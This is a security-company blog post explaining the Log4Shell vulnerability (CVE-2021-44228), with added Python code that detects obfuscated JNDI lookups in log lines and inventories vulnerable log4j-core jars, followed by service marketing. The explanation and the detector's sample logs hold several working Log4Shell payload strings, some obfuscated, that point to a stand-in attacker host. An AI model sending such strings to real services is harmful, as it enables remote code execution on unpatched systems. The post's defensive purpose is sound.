On December 9th, 2021, the information security community had its world turned upside down when a zero-day vulnerability was disclosed in Log4j, the Java logging library maintained by the Apache Software Foundation. Within hours, every major software company was in disaster mode, trying to work out which of its products were affected and how quickly a patch could be released. Jen Easterly, director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), called it the most serious vulnerability she has seen in her career. But just how bad is it?
Why is this so bad?
The Log4j vulnerability, nicknamed Log4Shell, is tracked as CVE-2021-44228 by MITRE and carries the maximum CVSS score of 10.0. Its size and scope are unlike anything researchers have seen before: it affects millions of applications around the world. Log4j is a logging library, the component an application uses to record what it has been doing (requests served, errors raised, users logged in) so that the activity can be reviewed later. Developers pull it into new applications as a matter of course because it is efficient, free and open source, which saves them writing and maintaining their own. The flaw first drew wide attention in the Minecraft community, where a player sent a crafted chat message to a friend's Minecraft server and got remote code execution (RCE) on it. Unfortunately the same trick works against any application that logs attacker-supplied text through a vulnerable version of the library, and there are millions of them.
What does this mean?
Imagine a specific type of bolt attached to the tire of a car suddenly becomes loose and stops working. Changing out that set of bolts on one car is easy, but think of how difficult it would be to find every car that uses that defective type of bolt. That is what the information security community is dealing with in Log4j. The mechanism itself is simple. Log4j 2 expands lookup expressions of the form "${...}" inside the messages it logs, and one of those lookups, "${jndi:...}", asks Java's naming service (JNDI) to fetch an object from a remote LDAP or RMI server. An outside attacker therefore only has to get a string such as "${jndi:ldap://attacker.example/a}" into something the application logs, whether a chat message, a username, a form field or an HTTP User-Agent header. The server then connects to the attacker's host, downloads the code it serves and runs it. That gives the attacker code execution with the privileges of the application, which is enough to enlist the machine in a botnet, mine cryptocurrency on it, or push ransomware to other systems it can reach.
What makes this vulnerability so frightening for so many companies is the combination of ubiquity and triviality. The malicious payload is a single short string: no memory corruption, no exploit chain, nothing to tune per target. Attackers who would never manage remote code execution on their own now have one of the most accessible attack paths to unpatched systems there has ever been. Because the library is embedded in so much open-source and commercial software, millions of applications are exposed to everyone from nation-state threat actors to low-skilled opportunists.
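To see why the payload is so easy to deliver and so awkward to catch with a plain text search, here is an added example written for this post; it is not code from the original article, from Netizen, or from Log4j itself. It is a small Python detector that flattens nested "${...}" lookups the way a vulnerable Log4j would before checking for the jndi: prefix, then runs over a handful of constructed web-server access-log lines. Only the lower:, upper: and ":-default" forms are modelled, because those are what attackers use to split the word "jndi" across several lookups; every other lookup is treated as one that fails to resolve. The log lines, hosts and URLs are all made up for the example.

```python
import re

# Innermost ${...} lookup: a body with no nested '$', '{' or '}'. Log4j's substitutor
# resolves from the inside out, so repeatedly collapsing the innermost lookup mirrors
# what a vulnerable log4j-core does before the JNDI lookup itself ever runs.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_UNRESOLVED = "\ufffd"  # stands in for lookups we cannot evaluate offline (env:, sys:, date:, ...)


def _resolve(body, hits):
    """Evaluate one innermost lookup body for the handful of lookups attackers use to
    assemble 'jndi' letter by letter. Any JNDI target encountered is appended to hits."""
    key, sep, default = body.partition(":-")  # the ${key:-default} syntax
    lowered = key.lower()
    if lowered.startswith("jndi:"):           # lookup names are matched case-insensitively
        hits.append(key[5:])
        return "jndi:" + key[5:]
    if lowered.startswith("lower:"):
        return key[6:].lower()
    if lowered.startswith("upper:"):
        return key[6:].upper()
    # Anything else (env:, sys:, date:, or the empty key in ${::-j}) is modelled as a
    # lookup that fails: Log4j then substitutes the ':-' default, or leaves it unresolved.
    return default if sep else _UNRESOLVED


def normalize(message, max_rounds=100):
    """Collapse nested lookups the way a vulnerable Log4j would. Returns the flattened
    text and the list of JNDI URLs the library would have tried to resolve."""
    hits = []
    text = message
    for _ in range(max_rounds):  # each round removes one '${', so this always terminates
        m = _INNER.search(text)
        if not m:
            break
        text = text[:m.start()] + _resolve(m.group(1), hits) + text[m.end():]
    return text, hits


def is_log4shell(message):
    """(flagged, flattened_text, jndi_targets) for one log line."""
    text, hits = normalize(message)
    return bool(hits), text, hits


def scan(lines):
    """Return (line_number, jndi_targets) for every line that reaches the JNDI code path."""
    out = []
    for i, line in enumerate(lines):
        flagged, _, hits = is_log4shell(line)
        if flagged:
            out.append((i, hits))
    return out


# Constructed access-log lines in Apache combined format. 203.0.113.0/24 is the RFC 5737
# documentation range; none of this is a real capture from any incident.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.66:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:L}dap://203.0.113.66:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:03:14:12 +0000] "GET /login HTTP/1.1" 401 88 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://203.0.113.66:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:03:14:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:${lower:r}mi://203.0.113.66:1099/b}"',
    '203.0.113.12 - - [10/Dec/2021:03:15:00 +0000] "GET / HTTP/1.1" 200 512 "-" "build ${date:yyyy} home=${env:HOME:-/root} ${sys:x}"',
    '203.0.113.12 - - [10/Dec/2021:03:15:01 +0000] "POST /api HTTP/1.1" 200 12 "-" "charset=${::-u}tf-8"',
]

if __name__ == "__main__":
    for lineno, targets in scan(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup to {targets}")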
What is the solution?
Exploiting a vulnerable application only requires getting the malicious string into something it logs, so the first line of defense is the software itself rather than its users. Apache's fix is to upgrade Log4j 2 to a patched release: 2.15.0 closed this hole, and the later 2.17.x releases should be used because they also address follow-on problems in the same lookup code. Where an upgrade cannot be deployed immediately, Apache's stop-gap is to delete the JndiLookup class from the log4j-core JAR, which disables the vulnerable lookup entirely. Vendors are hard at work shipping patches, so promptly install updates for the applications you rely on (browsers, mobile apps, games and server software alike) and watch for vendor advisories carrying additional directives for securing your infrastructure. Users still have a part to play, because the payload can arrive by any route that ends up in a log, including email: treat unexpected messages urging you to click a link or open an attachment with the usual suspicion, and verify the sender before replying to any email chain. If the address looks wrong, do not reply.
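Before you can patch, you have to find every copy of the library, including the ones buried inside WAR files and fat JARs, which is the "find every car" problem from the analogy above. The following Python script is an added example written for this post, not Netizen's assessment tooling and not anything from the Apache project. It walks a directory, reads the Maven pom.properties inside each archive to learn the log4j-core version, checks whether the JndiLookup class is still present (so a jar patched by Apache's class-removal stop-gap is reported as mitigated rather than vulnerable), and recurses into nested archives. The fixed-version thresholds are my reading of the Apache Log4j security page and should be re-checked against the current advisory; the deployment it scans is constructed in a temporary directory with stand-in jars, so it runs offline.

```python
import io
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")

# First release on each Log4j 2 maintenance branch that fixes CVE-2021-44228, as I read the
# Apache Log4j security page (2.3.1 on the Java 6 branch, 2.12.2 on the Java 7 branch); all
# other 2.x versions are measured against 2.15.0. Re-check against the current advisory.
FIXED_FROM = {(2, 3): (2, 3, 1), (2, 12): (2, 12, 2)}
DEFAULT_FIXED_FROM = (2, 15, 0)

def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a pre-release such as '2.0-beta9' sorts as (2, 0, 0)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(x or 0) for x in m.groups()) if m else None

def classify(version, has_jndi_lookup):
    """Status for one log4j-core archive from its version and whether JndiLookup.class is present."""
    if not has_jndi_lookup:
        return "mitigated: JndiLookup.class removed (still schedule the upgrade)"
    if version is None:
        return "unknown version: inspect manually"
    if version < FIXED_FROM.get(version[:2], DEFAULT_FIXED_FROM):
        return "VULNERABLE to CVE-2021-44228"
    return "fixed for CVE-2021-44228"

def inspect_archive(data, label, findings):
    """Inspect one archive held in memory and descend into nested jars (WARs, fat jars)."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip container, nothing to inspect
    with zf:
        names = set(zf.namelist())
        if POM_PROPERTIES in names or JNDI_LOOKUP_CLASS in names:
            version = None
            if POM_PROPERTIES in names:
                props = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
                m = re.search(r"^version=(.+)$", props, re.M)
                version = parse_version(m.group(1).strip()) if m else None
            findings.append((label, version, classify(version, JNDI_LOOKUP_CLASS in names)))
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXT):
                inspect_archive(zf.read(name), f"{label}!{name}", findings)

def scan_tree(root):
    """Walk a directory tree; return (archive_path, version, status) for every log4j-core found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    inspect_archive(fh.read(), os.path.relpath(path, root).replace(os.sep, "/"), findings)
    return findings

def _fake_log4j_core(version, with_jndi_lookup=True):
    """Constructed stand-in for log4j-core-<version>.jar holding only the two members inspected above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only, not real bytecode
    return buf.getvalue()

def build_sample_tree(root):
    """Constructed deployment: old jar, patched jar, old jar with JndiLookup deleted, and a WAR
    hiding another old jar under WEB-INF/lib."""
    os.makedirs(os.path.join(root, "webapp"))
    for fname, version, keep in [("log4j-core-2.14.1.jar", "2.14.1", True),
                                 ("log4j-core-2.17.1.jar", "2.17.1", True),
                                 ("log4j-core-2.14.1-stripped.jar", "2.14.1", False)]:
        with open(os.path.join(root, fname), "wb") as fh:
            fh.write(_fake_log4j_core(version, keep))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _fake_log4j_core("2.14.1"))
        zf.writestr("WEB-INF/lib/not-a-real-jar.jar", b"")  # exercises the BadZipFile branch
    with open(os.path.join(root, "webapp", "shop.war"), "wb") as fh:
        fh.write(war.getvalue())

def run_demo():
    """Build the constructed tree in a temporary directory, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)

if __name__ == "__main__":
    for label, version, status in run_demo():
        print(f"{label}: {'.'.join(map(str, version)) if version else '?'} -> {status}")
```

On a real host, call scan_tree on the application and library directories instead of run_demo. The class-removal stop-gap it recognises is the one Apache documented, zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class. Two limits to keep in mind: archives are matched by file extension and read fully into memory, and a copy of Log4j that a build has "shaded" into a different package name will not be found at the paths above, so treat a clean result as a starting point rather than proof.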
How Can Netizen Help?
Netizen ensures that security gets built in and not bolted on. We provide advanced solutions to protect critical IT infrastructure, such as our popular "CISO-as-a-Service", through which companies can leverage the expertise of executive-level cybersecurity professionals without bearing the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Questions or concerns? Feel free to reach out to us any time – https://www.netizen.net/contact